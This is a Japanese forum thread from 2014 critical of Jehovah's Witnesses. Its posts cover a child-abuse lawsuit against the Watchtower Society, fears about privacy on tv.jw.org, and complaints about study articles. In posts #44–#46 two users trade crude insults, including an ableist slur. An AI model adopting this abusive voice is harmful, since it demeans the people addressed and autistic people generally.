変なプログラマーが絶叫しても、またお節介なJWマイコンロボットたちが騒いでも、
ご自分で調べて自らのプライバシー、セキュリティーのために行動することは賢いと思います。

誰もこの分野で専門家になることは要求されていません。
また、変なプログラマーの常軌を逸した挑戦に答える責任も、誰にもありません。

自らを守るために知るべきことを知っていることは保護になるでしょう。

先週は、アメリカでは児童虐待の訴訟事件が10数件起こされたようで、インターネットメディアだけでなくTVなどでも流れたようです。Jehovah's Witnesses' child abuse scandalで検索をするとたくさんヒットすると思います。

ネットに上がっているその内のひとつを紹介します。

ゴンゾラ・キャンポス(Gonzalo Campos)は、1986年に聖書研究の世話をしていた7才のホセ・ロペツ(Jose Lopez)を性的に犯しました。会衆の長老たちは、キャンポスが既に他の4人の子供たちを犯していたことを知っていました。しかし何の行動も起こしませんでした。

キャンポスが1986年の虐待、加えて以前の他の子供の虐待を長老たちに告げたにもかかわらず、驚いたことに、彼はやがて1993年に長老となります。

とても不真面目に思えますが、2012年10/1付けの協会からの手紙によると、「すべてのケースにおいて、子供を性的に虐待した人が会衆内での奉仕の特権の不適格者となるとは必ずしもいえません。」という方針が伝えられています。

キャンポスがサン・ディエゴの2つの会衆で奉仕していた間の児童性的虐待罪を去年、2013/7/22日に告白して以来、メキシコの米国当局は、これまで処置を取っていませんが、「ルイーズ裁判官のものみの塔に対する強力な判決の結果、このぞっとする虐待の結果長年苦しんだ現在36歳の被害者のロペツ氏がついに公正と償いを得られることを、わたしたちは喜んでいます。」と、ロペツ氏の弁護士のイルウィン・ザルキン(Irwin Zalkin)は述べています。

ものみの塔協会は、成員の性的虐待の訴えを何年も無視してきました。
今回も法廷命令に非協力的で必要な文書の提出をしませんでした。
その結果、懈怠判決(かいたいはんけつ:非協力怠慢のための罰金判決)が出され、ものみの塔協会は$10.5 million(11億8000万円)の懲罰的損害賠償金(punitive damages)を含む$13.5million(15億2000万円)の罰金刑が確定しています。

http://rutube.ru/video/99dd9962f15f5049 … a91d194c9/

http://rutube.ru/video/1a1735b9b16f84a6 … 9bb26be0b/

JWの兄弟、姉妹たち、

ものみの塔協会はおかしいよ。
組織宗教はサタンの器だよ。

編集者 sk (2014年11月03日 13:49:49)

オフライン

#39 2014年11月02日 20:32:48

possible
ゲストユーザー

Test投稿です。

#40 2014年11月02日 20:34:32

possible
ゲストユーザー

カレブさん>
今度は投稿できました。
こちらのPCのほうで、どこかが調子が悪かっただけだと思います。
ありがとうございました。(゜゜)(。。)ペコッ

#41 2014年11月02日 20:49:38

possible
ゲストユーザー

最初に投稿したものは、たぶんこちらのPC不調により「エラー」が出たため、すべて「消え」ました。
もう一度、ここにすべてを思い出して書くのも面倒なので、簡単に言いたいことだけ書きますね。

私が、昔から(繰り返し)言ってる事柄があります。
それは、掲示板のないサイトを作る奴は『卑怯者』だと。
それは、自分の言いたいことだけを言って、相手の反論を許さないからです。

私は、現在、この掲示板で議論してる方々とは無関係でありますが、
私がここで何を言いたいのかと言えば、ブログに『コメント欄』も設置してないくせに、
いついつまでに答えろって、無理(不可能)だろってことです。
これは、私が昔から言ってること、つまり、『卑怯者』のすることです。
(ものみの塔のサイトなど、その典型ですね。このインターネットの世界で
「一方通行のみ」の情報発信に何の意味があるのでしょうか。)

私が言いたいのは、それだけです。

以上。

http://godpresencewithin.web.fc2.com/

#42 2014年11月02日 22:51:01

IX7D
ゲストユーザー

近いうちに奉仕会のプログラムでTV.JW.orgのビデオストリーミングによって統治体からのプライバシーに関する話が流されるそうです。
その中で、協会がJWのプラバシーをどれ程ハンドルするかに関して告げられるそうです。一般的にPCでソフトを使用する際に同意事項への同意が求められますが、その中身を詠む人などいませんよね。(結構PC内がスキャンされているかも。)
統治体は、JWが献身する時に、ものみの塔協会が神の霊に導かれている組織であり、その一員になることに同意したことを根拠に協会の知る権利を説明する模様です。

ちょっと待った
ていうことは、極端な話、「長老に限らず」JW全員がPCでの通信記録を常時監視されることを承諾させられる可能性がある、と捉えてよいですか?
それを承諾しないなら排斥とか・・
バプテスマのときにちゃんと監視ソフトをインストールしたことを証明する義務ができるとか・・
通信履歴を元に排斥にするとか・・

そういうことなんでしょうか?

#43 2014年11月02日 23:11:55

possible
ゲストユーザー

possible さんの発言:

最初に投稿したものは、たぶんこちらのPC不調により「エラー」が出たため、すべて「消え」ました。

上記のように、たぶん、この掲示板には「引用」であることをきちんと表示できる機能がある。
ちょっとまったと言う前に、そういう機能をきちんと使うべき。

そもそも、きちんと表示しないと、「著作権法違反」だからね。
機能を使わないのなら、「カギ括弧」などを使って、他人の文章と自分の文章を区別すべき。

ところで、例のブログ記事の「転載」(引用ではない)は、いったい誰がしたんでしょう?
「本人」じゃなければ、著作権法上、出来ないはず。

#44 2014年11月03日 00:12:41

IX7D
ゲストユーザー

はぁ?
引用を示す区別の為に矢印と改行を付けたんだよ
「カギ括弧「など」だろ?矢印と改行じゃ駄目なのか?
ならばその主張の法的ソースを出せよ
そもそも誰の発言か明白にする為の引用機能、括弧だろ
直前のレスの引用だから第3者的に発言の所有者は誰なのか一目瞭然だろ

脊髄反射で詰まらんツッコミする前によく考えような?

「著作権法上できないはず」?
お前は「此処は40キロ制限だから50キロで走る車は居ない筈」
って考えるクチか?
「誰がしたんでしょう」
↑誰かが名乗り出るとでも?名乗り出てそれが信頼できるとでも?

「ところで」じゃねぇよ
人の質問の「仕方」にケチつけたうえ内容には答えず
あまつさえ自分の下らん質問でさらっと塗りつぶしてんじゃねぇよ
失せろ糞アスペ野郎

#45 2014年11月03日 01:36:20

possible
ゲストユーザー

IX7D さんの発言:

はぁ?
引用を示す区別の為に矢印と改行を付けたんだよ
「カギ括弧「など」だろ?矢印と改行じゃ駄目なのか?

「はぁ?」じゃねえよ。まず、反応の仕方がアホだろ。
お前、リアルの世界でも、いつも「そんな反応」をしてんのか?
これじゃあ、お前に何かを言えば、いつでも必ずケンカが始まるな。

「矢印」と「改行」でも、まあ、お前なりの努力の結果だろうから、
それでも、まあ良しとするよ。だがな、分かりづれえんだよ。
それをするんだったら、引用を示す
>の印くらい、付けろや。こんな感じにだ。↓

>ならばその主張の法的ソースを出せよ
>そもそも誰の発言か明白にする為の引用機能、括弧だろ
>直前のレスの引用だから第3者的に発言の所有者は誰なのか一目瞭然だろ

ソースを出せとか、めんどくせえ奴だな。

「文化庁」のサイトに、こう書かれています。

文化庁 さんの発言:

他人の著作物を自分の著作物の中に取り込む場合,すなわち引用を行う場合,一般的には,以下の事項に注意しなければなりません。
(1)他人の著作物を引用する必然性があること。
(2)かぎ括弧をつけるなど,自分の著作物と引用部分とが区別されていること。
(3)自分の著作物と引用する著作物との主従関係が明確であること(自分の著作物が主体)。
(4)出所の明示がなされていること。(第48条)
(参照:最判昭和55年3月28日 「パロディー事件」)

http://www.bunka.go.jp/chosakuken/gaiyo … _jiyu.html

なお、「一目瞭然」というのは、お前の考えな。
「誰の発言か明白にする為の」引用だと言うのなら、
誰がそう言ったのか、ちゃんと書いとけや。

IX7D さんの発言:

「著作権法上できないはず」?
お前は「此処は40キロ制限だから50キロで走る車は居ない筈」
って考えるクチか?

まあ、言いたいことは分かるが、
俺は「間違ったことは言ってない」と思うぜ。
それとも、お前のその主張によって、お前の行為が正当化されるか?

IX7D さんの発言:

「誰がしたんでしょう」
↑誰かが名乗り出るとでも?名乗り出てそれが信頼できるとでも?

バカな奴。
もう少し、こちらが書いた「理由」を推し量れ。

著作権法上、そのブログから「転載」できるのは、
「書いた本人」か、その転載の「許可を著者からもらった人」だけだ。
なら、普通、その「ブログの著者」か、「その仲間」がここに書き込んだと考えて当然だろうに。

IX7D さんの発言:

失せろ糞アスペ野郎

「失せる」のは、俺じゃなくて、てめえのほうだ。
何が「失せろ」だ。ふざけるんじゃねえよ。
どこの掲示板だろうと、その掲示板の管理者が追い出すのでない限り、
誰が何を書こうが「自由」だろうに。

#46 2014年11月03日 02:55:37

IX7D
ゲストユーザー

なんだちゃんと判ってるじゃないないか。

いきなり口調変わってクソ吹いたわ

涙拭けよ
あと涎と小便もな。

で、糞は口から垂れるんじゃねーぞ
尻から垂れろや

本題をぞらしまくりやがって
よく考えろよ
この掲示板見てる連中で
「書き込みの著作権云々話題」と
「組織の個人情報吸い上げ問題」とではどっちが興味あると思うよ?

掲示板で話題ぶった切って無駄に目立とうとする奴(自治厨)まじでムカつくわ

なぁにが「そもそも、きちんと表示しないと、「著作権法違反」だからね。ところで~」(キリッ)
だよ

JJWが阿呆の巣窟と揶揄するわけだわ。

#47 2014年11月03日 11:49:40

1,000時間奉仕者
ゲストユーザー

子供たちの
「お前の母ちゃん、デ~ベソ」みたいな
不毛な応酬はそろそろやめて、
本題に戻りましょうよ。

せっかく敬意を持って読んでたのに……

#48 2014年11月03日 15:02:22

guest_2
ゲストユーザー

john_the_baptist博士様、最近頑張ってますね。応援してますヨ!
ところで普段どんな研究なさっているのでしょうね。
論文を見てみたいものです。

えっ
「低能なお前ごときに俺様の高度な論文など理解できんわい」
ってか(笑)

MITの教授ですか!?
とすると、顔写真はこちらの一覧にありますよね。

http://www.eecs.mit.edu/people/faculty-advisors
おお、たくさんいますね。きっとこの中のおひとりなんでしょうかねぇ~
あっもしかしてここかな。
http://web.mit.edu/Physics/people/faculty/index.html
ひょっとしてここかな。
http://www.media.mit.edu/people/faculty
あら日本人がいますね。

えっ
「俺様はここには載っていない、あまりにも高名すぎで別格なんだ」
ってか。

さすが!!MITでのご活躍期待してます!!

#49 2014年11月03日 20:27:55

jw4g
ゲストユーザー

「奇妙な記事の海の中で共鳴しうる一片の言葉に遭遇した時に、それが見える筈だ。」

はい。確かに。
しかしそれは記事ごとの極端な了見の相違として表れ、
結果信者を大きく揺さぶり、心を病ませる原因となっています。

例えば、
研究記事で「開拓奉仕をできないからといって気落ちする必要は有りません」
と書いておきながら、
暫く後の研究記事で「開拓者を目指さないJWは果たして神に言い訳できるのでしょうか」
とのたまう。

少し前の研究記事では
海外出稼ぎに出たJWは教育放棄及び物質主義の輩であり、
もはや霊的に絶望的存在であるとの、見解を2週にわたり扱っていましたが、

執筆者(校正者)は
このような極端なルサンチマンに因るとしか思えない憎悪発言を
信者に浴びせて、一体どういう了見なのでしょうか。

最低でも、
「海外出稼ぎはとても勧められたものではない、絶対避けるべきだが、既に出てしまった人は仕方ない、
でも、その場合はこうやって家族の絆及びに霊性を維持する努力すべき」
くらいの内容をどうして付け足せなかったのか。

「お前らはもう御終いだよ」で終わる内容なら、
・・そこまで謂うならいっそ海外出稼ぎに出た信者を皆排斥にしてはどうか?

・・
こういった調子で教育を施された信者は、
特に、批難を受ける該当者でかつ真面目に読んでいる者は発狂してしまいます。
現に、こういった了見に長年接した結果心を病んでしまった仲間を沢山見てきました。

極端な手のひら返しと
感情に任せて書いていることが見え見えの突き放した憎悪発言。
これで精神を病まないほうが不思議な気がします。

一体どうすればいいのでしょうか。
本当に行き詰まります。

#50 2014年11月03日 20:43:17

もんもん
メンバー

skさんはものみの塔協会が勝手に読み取ると考えているようですが、それは違ってこういうことではないでしょうか。

まず取得するプライバシーの内容を同意させて、tv.jw.orgを読み込むソフトウェアをインストールさせるということではないでしょうか。

僕にはものみの塔協会が正面から犯罪を犯すようには思えません。同意をさせて、tv.jw.org用のアプリをインストールさせて、そこから情報を読み取るという内容じゃないでしょうか。

こう考えるとつじつまが合うと思いませんか。

オフライン

クィック投稿

メッセージを書いて送信してください。

Board footer